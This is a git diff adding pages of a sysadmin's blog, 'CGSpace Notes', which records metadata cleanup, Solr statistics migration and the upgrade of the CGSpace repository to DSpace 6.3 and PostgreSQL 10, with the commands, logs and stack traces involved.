+</li>
+<li>Atmire responded about the duplicate values in Solr that I had asked about a few days ago
+<ul>
+<li>They said it could be due to the schema and asked if I see it only on old records or even on new ones created in the new CUA with DSpace 6</li>
+<li>I did a test and found that I got duplicate data after browsing for a minute on DSpace Test (version 6) and sent them a screenshot</li>
+</ul>
+</li>
+<li>Looking over Peter&rsquo;s corrections to journal titles (dc.source) and publishers (dc.publisher)
+<ul>
+<li>I had to check the corrections for strange Unicode errors and replacements with &ldquo;|&rdquo; and &ldquo;;&rdquo; in OpenRefine using this GREL:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>or(
+  isNotNull(value.match(/.*\uFFFD.*/)),
+  isNotNull(value.match(/.*\u00A0.*/)),
+  isNotNull(value.match(/.*\u200A.*/)),
+  isNotNull(value.match(/.*\u2019.*/)),
+  isNotNull(value.match(/.*\u00b4.*/)),
+  isNotNull(value.match(/.*\u007e.*/))
+).toString()
+</code></pre><ul>
+<li>Then I did a test to apply the corrections and deletions on my local DSpace:</li>
+</ul>
+<pre tabindex="0"><code>$ ./fix-metadata-values.py -i 2020-10-30-fix-854-journals.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.source -t &#39;correct&#39; -m 55
+$ ./delete-metadata-values.py -i 2020-10-30-delete-90-journals.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.source -m 55
+$ ./fix-metadata-values.py -i 2020-10-30-fix-386-publishers.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.publisher -t correct -m 39
+$ ./delete-metadata-values.py -i 2020-10-30-delete-10-publishers.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.publisher -m 39
+</code></pre><ul>
+<li>I will wait to apply them on CGSpace when I have all the other corrections from Peter processed</li>
+</ul>
+<h2 id="2020-10-31">2020-10-31</h2>
+<ul>
+<li>I had the idea to use the country formatter for CGSpace on the AReS Explorer because we have the <code>cg.coverage.iso3166-alpha2</code> field&hellip;
+<ul>
+<li>This will be better than using the raw text values because AReS will match directly from the ISO 3166-1 list when using the country formatter</li>
+</ul>
+</li>
+<li>Quickly process the sponsor corrections Peter sent me a few days ago and test them locally:</li>
+</ul>
+<pre tabindex="0"><code>$ ./fix-metadata-values.py -i 2020-10-31-fix-82-sponsors.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.description.sponsorship -t &#39;correct&#39; -m 29
+$ ./delete-metadata-values.py -i 2020-10-31-delete-74-sponsors.csv -db dspace -u dspace -p &#39;fuuu&#39; -f dc.description.sponsorship -m 29
+</code></pre><ul>
+<li>I applied all the fixes from today and yesterday on CGSpace and then started a full Discovery re-index:</li>
+</ul>
+<pre tabindex="0"><code>$ time chrt -b 0 ionice -c2 -n7 nice -n19 dspace index-discovery -b
+</code></pre><!-- raw HTML omitted -->
+
+  
+
+  
+
+</article> 
+
+
+
+        </div> <!-- /.blog-main -->
+
+        <aside class="col-sm-3 ml-auto blog-sidebar">
+  
+
+  
+        <section class="sidebar-module">
+    <h4>Recent Posts</h4>
+    <ol class="list-unstyled">
+
+
+<li><a href="/cgspace-notes/2023-07/">July, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-06/">June, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-05/">May, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-04/">April, 2023</a></li>
+
+<li><a href="/cgspace-notes/2023-03/">March, 2023</a></li>
+
+    </ol>
+  </section>
+
+  
+
+  
+  <section class="sidebar-module">
+    <h4>Links</h4>
+    <ol class="list-unstyled">
+      
+      <li><a href="https://cgspace.cgiar.org">CGSpace</a></li>
+      
+      <li><a href="https://dspacetest.cgiar.org">DSpace Test</a></li>
+      
+      <li><a href="https://github.com/ilri/DSpace">CGSpace @ GitHub</a></li>
+      
+    </ol>
+  </section>
+  
+</aside>
+
+
+      </div> <!-- /.row -->
+    </div> <!-- /.container -->
+    
+
+    
+    <footer class="blog-footer">
+      <p dir="auto">
+      
+      Blog template created by <a href="https://twitter.com/mdo">@mdo</a>, ported to Hugo by <a href='https://twitter.com/mralanorth'>@mralanorth</a>.
+      
+      </p>
+      <p>
+      <a href="#">Back to top</a>
+      </p>
+    </footer>
+    
+
+  </body>
+
+</html>
diff --git a/docs/2020-11/index.html b/docs/2020-11/index.html
new file mode 100644
index 000000000..a56c859a7
--- /dev/null
+++ b/docs/2020-11/index.html
@@ -0,0 +1,785 @@
+<!DOCTYPE html>
+<html lang="en" >
+
+  <head>
+    <meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
+
+
+<meta property="og:title" content="November, 2020" />
+<meta property="og:description" content="2020-11-01
+
+Continue with processing the statistics-2019 Solr core with the AtomicStatisticsUpdateCLI tool on DSpace Test
+
+So far we&rsquo;ve spent at least fifty hours to process the statistics and statistics-2019 core&hellip; wow.
+
+
+" />
+<meta property="og:type" content="article" />
+<meta property="og:url" content="https://alanorth.github.io/cgspace-notes/2020-11/" />
+<meta property="article:published_time" content="2020-11-01T13:11:54+02:00" />
+<meta property="article:modified_time" content="2020-11-30T20:12:55+02:00" />
+
+
+
+<meta name="twitter:card" content="summary"/>
+<meta name="twitter:title" content="November, 2020"/>
+<meta name="twitter:description" content="2020-11-01
+
+Continue with processing the statistics-2019 Solr core with the AtomicStatisticsUpdateCLI tool on DSpace Test
+
+So far we&rsquo;ve spent at least fifty hours to process the statistics and statistics-2019 core&hellip; wow.
+
+
+"/>
+<meta name="generator" content="Hugo 0.112.3">
+
+
+    
+<script type="application/ld+json">
+{
+  "@context": "http://schema.org",
+  "@type": "BlogPosting",
+  "headline": "November, 2020",
+  "url": "https://alanorth.github.io/cgspace-notes/2020-11/",
+  "wordCount": "3655",
+  "datePublished": "2020-11-01T13:11:54+02:00",
+  "dateModified": "2020-11-30T20:12:55+02:00",
+  "author": {
+    "@type": "Person",
+    "name": "Alan Orth"
+  },
+  "keywords": "Notes"
+}
+</script>
+
+
+
+    <link rel="canonical" href="https://alanorth.github.io/cgspace-notes/2020-11/">
+
+    <title>November, 2020 | CGSpace Notes</title>
+
+    
+    <!-- combined, minified CSS -->
+    
+    <link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
+    
+
+    <!-- minified Font Awesome for SVG icons -->
+    
+    <script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
+
+    <!-- RSS 2.0 feed -->
+    
+
+    
+
+  </head>
+
+  <body>
+
+    
+    <div class="blog-masthead">
+      <div class="container">
+        <nav class="nav blog-nav">
+          <a class="nav-link " href="https://alanorth.github.io/cgspace-notes/">Home</a>
+        </nav>
+      </div>
+    </div>
+    
+
+    
+    
+    <header class="blog-header">
+      <div class="container">
+        <h1 class="blog-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/" rel="home">CGSpace Notes</a></h1>
+        <p class="lead blog-description" dir="auto">Documenting day-to-day work on the <a href="https://cgspace.cgiar.org">CGSpace</a> repository.</p>
+      </div>
+    </header>
+    
+    
+
+    
+    <div class="container">
+      <div class="row">
+        <div class="col-sm-8 blog-main">
+
+          
+
+
+<article class="blog-post">
+  <header>
+    <h2 class="blog-post-title" dir="auto"><a href="https://alanorth.github.io/cgspace-notes/2020-11/">November, 2020</a></h2>
+    <p class="blog-post-meta">
+<time datetime="2020-11-01T13:11:54+02:00">Sun Nov 01, 2020</time>
+ in 
+<span class="fas fa-folder" aria-hidden="true"></span>&nbsp;<a href="/categories/notes/" rel="category tag">Notes</a>
+
+
+</p>
+  </header>
+  <h2 id="2020-11-01">2020-11-01</h2>
+<ul>
+<li>Continue with processing the statistics-2019 Solr core with the AtomicStatisticsUpdateCLI tool on DSpace Test
+<ul>
+<li>So far we&rsquo;ve spent at least fifty hours to process the statistics and statistics-2019 core&hellip; wow.</li>
+</ul>
+</li>
+</ul>
+<h2 id="2020-11-02">2020-11-02</h2>
+<ul>
+<li>Talk to Moayad and fix a few issues on OpenRXV:
+<ul>
+<li>Incorrect views and downloads (caused by Elasticsearch&rsquo;s default result set size of 10)</li>
+<li>Invalid share link</li>
+<li>Missing &ldquo;https://&rdquo; for Handles in the Simple Excel report (caused by using the <code>handle</code> instead of the <code>uri</code>)</li>
+<li>Sorting the list of items by views</li>
+</ul>
+</li>
+<li>I resumed the processing of the statistics-2018 Solr core after it spent 20 hours to get to 60%</li>
+</ul>
+<h2 id="2020-11-04">2020-11-04</h2>
+<ul>
+<li>After 29 hours the statistics-2017 core finished processing so I started the statistics-2016 core on DSpace Test</li>
+</ul>
+<h2 id="2020-11-05">2020-11-05</h2>
+<ul>
+<li>Peter sent me corrections and deletions for the author affiliations
+<ul>
+<li>I quickly proofed them for UTF-8 issues in OpenRefine and csv-metadata-quality and then tested them locally and then applied them on CGSpace:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>$ ./fix-metadata-values.py -i 2020-11-05-fix-862-affiliations.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.contributor.affiliation -t &#39;correct&#39; -m 211
+$ ./delete-metadata-values.py -i 2020-11-05-delete-29-affiliations.csv -db dspace -u dspace -p &#39;fuuu&#39; -f cg.contributor.affiliation -m 211
+</code></pre><ul>
+<li>Then I started a Discovery re-index on CGSpace:</li>
+</ul>
+<pre tabindex="0"><code>$ time chrt -b 0 ionice -c2 -n7 nice -n19 dspace index-discovery -b
+
+real    92m24.993s
+user    8m11.858s
+sys     2m26.931s
+</code></pre><h2 id="2020-11-06">2020-11-06</h2>
+<ul>
+<li>Restart the AtomicStatisticsUpdateCLI processing of the statistics-2016 core on DSpace Test after 20 hours&hellip;
+<ul>
+<li>This phase finished after five hours so I started it on the statistics-2015 core</li>
+</ul>
+</li>
+</ul>
+<h2 id="2020-11-07">2020-11-07</h2>
+<ul>
+<li>Atmire responded about the issue with duplicate values in owningComm and containerCommunity etc
+<ul>
+<li>I told them to please look into it and use some of our credits if need be</li>
+</ul>
+</li>
+<li>The statistics-2015 core finished after 20 hours so I started the statistics-2014 core</li>
+</ul>
+<h2 id="2020-11-08">2020-11-08</h2>
+<ul>
+<li>Add &ldquo;Data Paper&rdquo; to types on CGSpace</li>
+<li>Add &ldquo;SCALING CLIMATE-SMART AGRICULTURE&rdquo; to CCAFS subjects on CGSpace</li>
+<li>Add &ldquo;ANDEAN ROOTS AND TUBERS&rdquo; to CIP subjects on CGSpace</li>
+<li>Add CGIAR System subjects to Discovery sidebar facets on CGSpace
+<ul>
+<li>Also add the System subject to item view on CGSpace</li>
+</ul>
+</li>
+<li>The statistics-2014 core finished processing after five hours, so I started processing the statistics-2013 core on DSpace Test</li>
+<li>Since I was going to restart CGSpace and update the Discovery indexes anyways I decided to check for any straggling upper case AGROVOC entries and lower case them:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# BEGIN;
+dspace=# UPDATE metadatavalue SET text_value=LOWER(text_value) WHERE resource_type_id=2 AND metadata_field_id=57 AND text_value ~ &#39;[[:upper:]]&#39;;
+UPDATE 164
+dspace=# COMMIT;
+</code></pre><ul>
+<li>Run system updates on CGSpace (linode18) and reboot it
+<ul>
+<li>I had to restart Tomcat once after the machine started up to get all Solr statistics cores to load properly</li>
+</ul>
+</li>
+<li>After about ten more hours the rest of the Solr statistics cores finished processing on DSpace Test and I started optimizing them in Solr admin UI</li>
+</ul>
+<h2 id="2020-11-10">2020-11-10</h2>
+<ul>
+<li>I am noticing that CGSpace doesn&rsquo;t have any statistics showing for years before 2020, but all cores are loaded successfully in Solr Admin UI&hellip; strange
+<ul>
+<li>I restarted Tomcat and I see in Solr Admin UI that the statistics-2015 core failed to load</li>
+<li>Looking in the DSpace log I see:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>2020-11-10 08:43:59,634 INFO  org.dspace.statistics.SolrLogger @ Loading core with name: statistics-2015
+2020-11-10 08:43:59,687 INFO  org.dspace.statistics.SolrLogger @ Loading core with name: statistics-2018
+2020-11-10 08:43:59,707 INFO  org.dspace.statistics.SolrLogger @ Loading core with name: statistics-2015
+2020-11-10 08:44:00,004 WARN  org.dspace.core.ConfigurationManager @ Requested configuration module: atmire-datatables not found
+2020-11-10 08:44:00,005 WARN  org.dspace.core.ConfigurationManager @ Requested configuration module: atmire-datatables not found
+2020-11-10 08:44:00,005 WARN  org.dspace.core.ConfigurationManager @ Requested configuration module: atmire-datatables not found
+2020-11-10 08:44:00,325 INFO  org.dspace.statistics.SolrLogger @ Created core with name: statistics-2015
+</code></pre><ul>
+<li>Seems that the core gets probed twice&hellip; perhaps a threading issue?
+<ul>
+<li>The only thing I can think of is the <code>acceptorThreadCount</code> parameter in Tomcat&rsquo;s server.xml, which has been set to 2 since 2018-01 (we started sharding the Solr statistics cores in 2019-01 and that&rsquo;s when this problem arose)</li>
+<li>I will try reducing that to 1</li>
+<li>Wow, now it&rsquo;s even worse:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>2020-11-10 08:51:03,007 INFO  org.dspace.statistics.SolrLogger @ Created core with name: statistics-2018
+2020-11-10 08:51:03,008 INFO  org.dspace.statistics.SolrLogger @ Loading core with name: statistics-2015
+2020-11-10 08:51:03,137 INFO  org.dspace.statistics.SolrLogger @ Loading core with name: statistics-2018
+2020-11-10 08:51:03,153 INFO  org.dspace.statistics.SolrLogger @ Loading core with name: statistics-2015
+2020-11-10 08:51:03,289 INFO  org.dspace.statistics.SolrLogger @ Created core with name: statistics-2015
+2020-11-10 08:51:03,289 INFO  org.dspace.statistics.SolrLogger @ Loading core with name: statistics-2010
+2020-11-10 08:51:03,475 INFO  org.dspace.statistics.SolrLogger @ Created core with name: statistics-2010
+2020-11-10 08:51:03,475 INFO  org.dspace.statistics.SolrLogger @ Loading core with name: statistics-2016
+2020-11-10 08:51:03,730 INFO  org.dspace.statistics.SolrLogger @ Created core with name: statistics-2016
+2020-11-10 08:51:03,731 INFO  org.dspace.statistics.SolrLogger @ Loading core with name: statistics-2017
+2020-11-10 08:51:03,992 INFO  org.dspace.statistics.SolrLogger @ Created core with name: statistics-2017
+2020-11-10 08:51:03,992 INFO  org.dspace.statistics.SolrLogger @ Loading core with name: statistics-2011
+2020-11-10 08:51:04,178 INFO  org.dspace.statistics.SolrLogger @ Created core with name: statistics-2011
+2020-11-10 08:51:04,178 INFO  org.dspace.statistics.SolrLogger @ Loading core with name: statistics-2012
+</code></pre><ul>
+<li>Could it be because we have two Tomcat connectors?
+<ul>
+<li>I restarted Tomcat a few more times before all cores loaded, and still there are no stats before 2020-01&hellip; hmmmmm</li>
+</ul>
+</li>
+<li>I added a <a href="https://github.com/ilri/OpenRXV/commit/3816b9b3f3d9182d2ba1a899c1017c5895a59dee">lowercase formatter to OpenRXV</a> so that we can lowercase AGROVOC subjects during harvesting</li>
+</ul>
+<h2 id="2020-11-11">2020-11-11</h2>
+<ul>
+<li>Atmire responded with a quote for the work to fix the duplicate owningComm, etc in our Solr data
+<ul>
+<li>I told them to proceed, as it&rsquo;s within our budget of credits</li>
+<li>They will write a processor for DSpace 6 to remove the duplicates</li>
+</ul>
+</li>
+<li>I did some tests to add a usage statistics chart to the item views on DSpace Test
+<ul>
+<li>It is inspired by Salem&rsquo;s work on WorldFish&rsquo;s repository, and it hits the dspace-statistics-api for the current item and displays a graph</li>
+<li>I got it working very easily for all-time statistics with Chart.js, but I think I will need to use Highcharts or something else because Chart.js is HTML5 canvas and doesn&rsquo;t allow theming via CSS (so our Bootstrap brand colors for each theme won&rsquo;t work)
+<ul>
+<li>Hmm, Highcharts is not licensed under and open source license so I will not use it</li>
+<li>Perhaps I&rsquo;ll use Chartist with the popover plugin&hellip;</li>
+</ul>
+</li>
+<li>I think I&rsquo;ll pursue this after the DSpace 6 upgrade&hellip;</li>
+</ul>
+</li>
+</ul>
+<h2 id="2020-11-12">2020-11-12</h2>
+<ul>
+<li>I was looking at Solr again trying to find a way to get community and collection stats by faceting on <code>owningComm</code> and <code>owningColl</code> and it seems to work actually
+<ul>
+<li>The duplicated values in the multi-value fields don&rsquo;t seem to affect the counts, as I had thought previously (though we should still get rid of them)</li>
+<li>One major difference between the raw numbers I was looking at and Atmire&rsquo;s numbers is that Atmire&rsquo;s code filters &ldquo;Internal&rdquo; IP addresses&hellip;</li>
+<li>Also, instead of doing <code>isBot:false</code> I think I should do <code>-isBot:true</code> because it&rsquo;s not a given that all documents will have this field and have it false, but we can definitely exclude the ones that have it as true</li>
+</ul>
+</li>
+<li>First we get the total number of communities with stats (using calcdistinct):</li>
+</ul>
+<pre tabindex="0"><code>facet=true&amp;facet.field=owningComm&amp;facet.mincount=1&amp;facet.limit=1&amp;facet.offset=0&amp;stats=true&amp;stats.field=owningComm&amp;stats.calcdistinct=true&amp;shards=http://localhost:8081/solr/statistics,http://localhost:8081/solr/statistics-2019,http://localhost:8081/solr/statistics-2018,http://localhost:8081/solr/statistics-2017,http://localhost:8081/solr/statistics-2016,http://localhost:8081/solr/statistics-2015,http://localhost:8081/solr/statistics-2014,http://localhost:8081/solr/statistics-2013,http://localhost:8081/solr/statistics-2012,http://localhost:8081/solr/statistics-2011,http://localhost:8081/solr/statistics-2010
+</code></pre><ul>
+<li>Then get stats themselves, iterating 100 items at a time with limit and offset:</li>
+</ul>
+<pre tabindex="0"><code>facet=true&amp;facet.field=owningComm&amp;facet.mincount=1&amp;facet.limit=100&amp;facet.offset=0&amp;shards=http://localhost:8081/solr/statistics,http://localhost:8081/solr/statistics-2019,http://localhost:8081/solr/statistics-2018,http://localhost:8081/solr/statistics-2017,http://localhost:8081/solr/statistics-2016,http://localhost:8081/solr/statistics-2015,http://localhost:8081/solr/statistics-2014,http://localhost:8081/solr/statistics-2013,http://localhost:8081/solr/statistics-2012,http://localhost:8081/solr/statistics-2011,http://localhost:8081/solr/statistics-2010
+</code></pre><ul>
+<li>I was surprised to see 10,000,000 docs with <code>isBot:true</code> when I was testing on DSpace Test&hellip;
+<ul>
+<li>This has got to be a mistake of some kind, as I see 4 million in 2014 that are from <code>dns:localhost.</code>, perhaps that&rsquo;s when we didn&rsquo;t have useProxies set up correctly?</li>
+<li>I don&rsquo;t see the same thing on CGSpace&hellip; I wonder what happened?</li>
+<li>Perhaps they got re-tagged during the DSpace 6 upgrade, somehow during the Solr migration? Hmmmmm. Definitely have to be careful with <code>isBot:true</code> in the future and not automatically purge these!!!</li>
+</ul>
+</li>
+<li>I noticed 120,000+ hits from monit, FeedBurner, and Blackboard Safeassign in 2014, 2015, 2016, 2017, etc&hellip;
+<ul>
+<li>I hadn&rsquo;t seen monit before, but the others are already in DSpace&rsquo;s spider agents lists for some time so probably only appear in older stats cores</li>
+<li>The issue with purging these using <code>check-spider-hits.sh</code> is that it can&rsquo;t do case-insensitive regexes and some metacharacters like <code>\s</code> don&rsquo;t work so I added case-sensitive patterns to a local agents file and purged them with the script</li>
+</ul>
+</li>
+</ul>
+<h2 id="2020-11-15">2020-11-15</h2>
+<ul>
+<li>Upgrade CGSpace to DSpace 6.3
+<ul>
+<li>First build, update, and migrate the database:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>$ dspace cleanup -v
+$ git checkout origin/6_x-dev-atmire-modules
+$ npm install -g yarn
+$ chrt -b 0 mvn -U -Dmirage2.on=true -Dmirage2.deps.included=false -P \!dspace-lni,\!dspace-rdf,\!dspace-sword,\!dspace-swordv2,\!dspace-jspui clean package
+$ sudo su - postgres
+$ psql dspace -c &#39;CREATE EXTENSION pgcrypto;&#39;
+$ psql dspace -c &#34;DELETE FROM schema_version WHERE version IN (&#39;5.8.2015.12.03.3&#39;);&#34;
+$ exit
+$ rm -rf /home/cgspace/config/spring
+$ ant update
+$ dspace database info
+$ dspace database migrate
+$ sudo systemctl start tomcat7
+</code></pre><ul>
+<li>After starting Tomcat DSpace should start up OK and begin Discovery indexing, but I want to also upgrade from PostgreSQL 9.6 to 10
+<ul>
+<li>I installed and configured PostgreSQL 10 using the Ansible playbooks, then migrated the database manually:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code># systemctl stop tomcat7
+# pg_ctlcluster 9.6 main stop
+# tar -cvzpf var-lib-postgresql-9.6.tar.gz /var/lib/postgresql/9.6
+# tar -cvzpf etc-postgresql-9.6.tar.gz /etc/postgresql/9.6
+# pg_ctlcluster 10 main stop
+# pg_dropcluster 10 main
+# pg_upgradecluster 9.6 main
+# pg_dropcluster 9.6 main
+# systemctl start postgresql
+# dpkg -l | grep postgresql | grep 9.6 | awk &#39;{print $2}&#39; | xargs dpkg -r
+</code></pre><ul>
+<li>Then I ran all system updates and rebooted the server&hellip;</li>
+<li>After the server came back up I re-ran the Ansible playbook to make sure all configs and services were updated</li>
+<li>I disabled the dspace-statistsics-api for now because it won&rsquo;t work until I migrate all the Solr statistics anyways</li>
+<li>Start a full Discovery re-indexing:</li>
+</ul>
+<pre tabindex="0"><code>$ time chrt -b 0 ionice -c2 -n7 nice -n19 dspace index-discovery -b
+
+real    211m30.726s
+user    134m40.124s
+sys     2m17.979s
+</code></pre><ul>
+<li>Towards the end of the indexing there were a few dozen of these messages:</li>
+</ul>
+<pre tabindex="0"><code>2020-11-15 13:23:21,685 INFO  com.atmire.dspace.discovery.service.AtmireSolrService @ Removed Item: null from Index
+</code></pre><ul>
+<li>I updated all the Ansible infrastructure and DSpace branches to be the DSpace 6 ones</li>
+<li>I will wait until the Discovery indexing is finished to start doing the Solr statistics migration</li>
+<li>I tested the email functionality and it seems to need more configuration:</li>
+</ul>
+<pre tabindex="0"><code>$ dspace test-email
+
+About to send test email:
+ - To: blah@cgiar.org
+ - Subject: DSpace test email
+ - Server: smtp.office365.com
+
+Error sending email:
+ - Error: com.sun.mail.smtp.SMTPSendFailedException: 451 5.7.3 STARTTLS is required to send mail [AM4PR0701CA0003.eurprd07.prod.outlook.com]
+</code></pre><ul>
+<li>I copied the <code>mail.extraproperties = mail.smtp.starttls.enable=true</code> setting from the old DSpace 5 <code>dspace.cfg</code> and now the emails are working</li>
+<li>After the Discovery indexing finished I started processing the Solr stats one core and 2.5 million records at a time:</li>
+</ul>
+<pre tabindex="0"><code>$ export JAVA_OPTS=&#39;-Dfile.encoding=UTF-8 -Xmx2048m&#39;
+$ chrt -b 0 dspace solr-upgrade-statistics-6x -n 2500000 -i statistics
+</code></pre><ul>
+<li>After about 6,000,000 records I got the same error that I&rsquo;ve gotten every time I test this migration process:</li>
+</ul>
+<pre tabindex="0"><code>Exception: Error while creating field &#39;p_group_id{type=uuid,properties=indexed,stored,multiValued}&#39; from value &#39;10&#39;
+org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Error while creating field &#39;p_group_id{type=uuid,properties=indexed,stored,multiValued}&#39; from value &#39;10&#39;
+        at org.apache.solr.client.solrj.impl.HttpSolrServer.executeMethod(HttpSolrServer.java:552)
+        at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:210)
+        at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:206)
+        at org.apache.solr.client.solrj.request.AbstractUpdateRequest.process(AbstractUpdateRequest.java:124)
+        at org.apache.solr.client.solrj.SolrServer.add(SolrServer.java:68)
+        at org.apache.solr.client.solrj.SolrServer.add(SolrServer.java:54)
+        at org.dspace.util.SolrUpgradePre6xStatistics.batchUpdateStats(SolrUpgradePre6xStatistics.java:161)
+        at org.dspace.util.SolrUpgradePre6xStatistics.run(SolrUpgradePre6xStatistics.java:456)
+        at org.dspace.util.SolrUpgradePre6xStatistics.main(SolrUpgradePre6xStatistics.java:365)
+        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
+        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
+        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+        at java.lang.reflect.Method.invoke(Method.java:498)
+        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:229)
+        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:81)
+</code></pre><h2 id="2020-11-16">2020-11-16</h2>
+<ul>
+<li>Users are having issues submitting items to CGSpace
+<ul>
+<li>Looking at the data I see that connections skyrocketed since DSpace 6 upgrade yesterday, and they are all in &ldquo;waiting for lock&rdquo; state:</li>
+</ul>
+</li>
+</ul>
+<p><img src="/cgspace-notes/2020/11/postgres_connections_ALL-week.png" alt="PostgreSQL connections week">
+<img src="/cgspace-notes/2020/11/postgres_locks_ALL-week.png" alt="PostgreSQL locks week"></p>
+<ul>
+<li>There are almost 1,500 locks:</li>
+</ul>
+<pre tabindex="0"><code>$ psql -c &#39;SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;&#39; | wc -l
+1494
+</code></pre><ul>
+<li>I sent a mail to the dspace-tech mailing list to ask for help&hellip;
+<ul>
+<li>For now I just restarted PostgreSQL and a few users were able to complete submissions&hellip;</li>
+</ul>
+</li>
+<li>While processing the statistics-2018 Solr core I got the <em>same</em> memory error that I have gotten every time I processed this core in testing:</li>
+</ul>
+<pre tabindex="0"><code>Exception: Java heap space
+java.lang.OutOfMemoryError: Java heap space
+        at java.util.Arrays.copyOf(Arrays.java:3332)
+        at java.lang.AbstractStringBuilder.ensureCapacityInternal(AbstractStringBuilder.java:124)
+        at java.lang.AbstractStringBuilder.append(AbstractStringBuilder.java:448)
+        at java.lang.StringBuffer.append(StringBuffer.java:270)
+        at java.io.StringWriter.write(StringWriter.java:101)
+        at org.apache.solr.common.util.XML.writeXML(XML.java:133)
+        at org.apache.solr.client.solrj.util.ClientUtils.writeVal(SourceFile:160)
+        at org.apache.solr.client.solrj.util.ClientUtils.writeXML(SourceFile:128)
+        at org.apache.solr.client.solrj.request.UpdateRequest.writeXML(UpdateRequest.java:365)
+        at org.apache.solr.client.solrj.request.UpdateRequest.getXML(UpdateRequest.java:281)
+        at org.apache.solr.client.solrj.request.RequestWriter.getContentStream(RequestWriter.java:67)
+        at org.apache.solr.client.solrj.request.RequestWriter$LazyContentStream.getDelegate(RequestWriter.java:95)
+        at org.apache.solr.client.solrj.request.RequestWriter$LazyContentStream.getName(RequestWriter.java:105)
+        at org.apache.solr.client.solrj.impl.HttpSolrServer.createMethod(HttpSolrServer.java:302)
+        at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:210)
+        at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:206)
+        at org.apache.solr.client.solrj.request.AbstractUpdateRequest.process(AbstractUpdateRequest.java:124)
+        at org.apache.solr.client.solrj.SolrServer.add(SolrServer.java:68)
+        at org.apache.solr.client.solrj.SolrServer.add(SolrServer.java:54)
+        at org.dspace.util.SolrUpgradePre6xStatistics.batchUpdateStats(SolrUpgradePre6xStatistics.java:161)
+        at org.dspace.util.SolrUpgradePre6xStatistics.run(SolrUpgradePre6xStatistics.java:456)
+        at org.dspace.util.SolrUpgradePre6xStatistics.main(SolrUpgradePre6xStatistics.java:365)
+        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
+        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
+        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+        at java.lang.reflect.Method.invoke(Method.java:498)
+        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:229)
+        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:81)
+</code></pre><ul>
+<li>I increased the Java heap memory to 4096MB and restarted the processing
+<ul>
+<li>After a few hours I got the following error, which I have gotten several times over the last few months:</li>
+</ul>
+</li>
+</ul>
+<pre tabindex="0"><code>Exception: Error while creating field &#39;p_group_id{type=uuid,properties=indexed,stored,multiValued}&#39; from value &#39;10&#39;
+org.apache.solr.client.solrj.impl.HttpSolrServer$RemoteSolrException: Error while creating field &#39;p_group_id{type=uuid,properties=indexed,stored,multiValued}&#39; from value &#39;10&#39;
+        at org.apache.solr.client.solrj.impl.HttpSolrServer.executeMethod(HttpSolrServer.java:552)
+        at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:210)
+        at org.apache.solr.client.solrj.impl.HttpSolrServer.request(HttpSolrServer.java:206)
+        at org.apache.solr.client.solrj.request.AbstractUpdateRequest.process(AbstractUpdateRequest.java:124)
+        at org.apache.solr.client.solrj.SolrServer.add(SolrServer.java:68)
+        at org.apache.solr.client.solrj.SolrServer.add(SolrServer.java:54)
+        at org.dspace.util.SolrUpgradePre6xStatistics.batchUpdateStats(SolrUpgradePre6xStatistics.java:161)
+        at org.dspace.util.SolrUpgradePre6xStatistics.run(SolrUpgradePre6xStatistics.java:456)
+        at org.dspace.util.SolrUpgradePre6xStatistics.main(SolrUpgradePre6xStatistics.java:365)
+        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
+        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
+        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+        at java.lang.reflect.Method.invoke(Method.java:498)
+        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:229)
+        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:81)
+</code></pre><h2 id="2020-11-17">2020-11-17</h2>
+<ul>
